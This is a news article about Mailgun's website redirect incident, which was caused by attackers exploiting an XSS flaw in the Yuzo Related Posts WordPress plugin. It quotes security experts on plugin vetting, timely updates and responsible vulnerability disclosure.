Email automation and delivery service Mailgun, announced that it has resolved a security incident that resulted from a massive coordinated attack against WordPress sites.
“The mailgun.com webpage began issuing redirects to sites outside of our domain. We immediately launched an incident to determine the source of the redirects and determined that a plugin for WordPress was responsible for issuing the redirects. We've disabled the plugin responsible for this issue,” the security incident notice said.
“Our applications including the Mailgun Dashboard, APIs, and customer data stored on our platform were not impacted by this issue.”
In a massive attack on WordPress sites, bad actors exploited a cross-site scripting (XSS) vulnerability in the WordPress plugin called Yuzo Related Posts plugin to inject JavaScript, redirecting visitors to various malicious tech support scams, spam ad pages, malware software updates and more.
“While unfortunate, this is not new and will be a problem that always persist,” said Chris Morales, head of security analytics at Vectra. “The best advice I can give at this time is that users need to pay careful attention to the sites they do visit at any given time and be careful what information they are providing.”
The problem with the Yuzo plugin was reportedly worsened because the web developer who discovered the vulnerability published the proof-of-concept code rather than reporting the issue to the plugin author, who posted that he will soon send an improved version of the plugin for all users.
“Vulnerabilities in WordPress plugins has been a long-standing problem. The plug-in directory is very much like the Google Play store, where vetting of apps is a major weakness,” said Chris Orr, systems engineer at Tripwire.
“Lack of notification by the plug-in developer is also an issue to contend with. It is recommended that WordPress users either automatically update the platform and their apps or pay close attention to the ones they use and how they behave and keep an eye out for vulnerabilities.”
Notification from the developer, though, was somewhat complicated by the lack of care taken to properly disclose the vulnerability, according to Oscar Tovar, application security specialist at WhiteHat Security.
“Proper, responsible vulnerability disclosures are something that should be carried with the utmost of care. The failure to do so can have widespread and serious repercussions. In this case, it was unfortunate that the zero-day was released to the public instead of the plugin author. If the author had been alerted with the vulnerability’s proof of concept, things would have played out completely differently.
“This incident can serve as a valuable example of how serious publishing a zero-day into the wild can be and hopefully prevent the same error from happening again in the future. The risks of deviating from a responsible disclosure are simply too great.”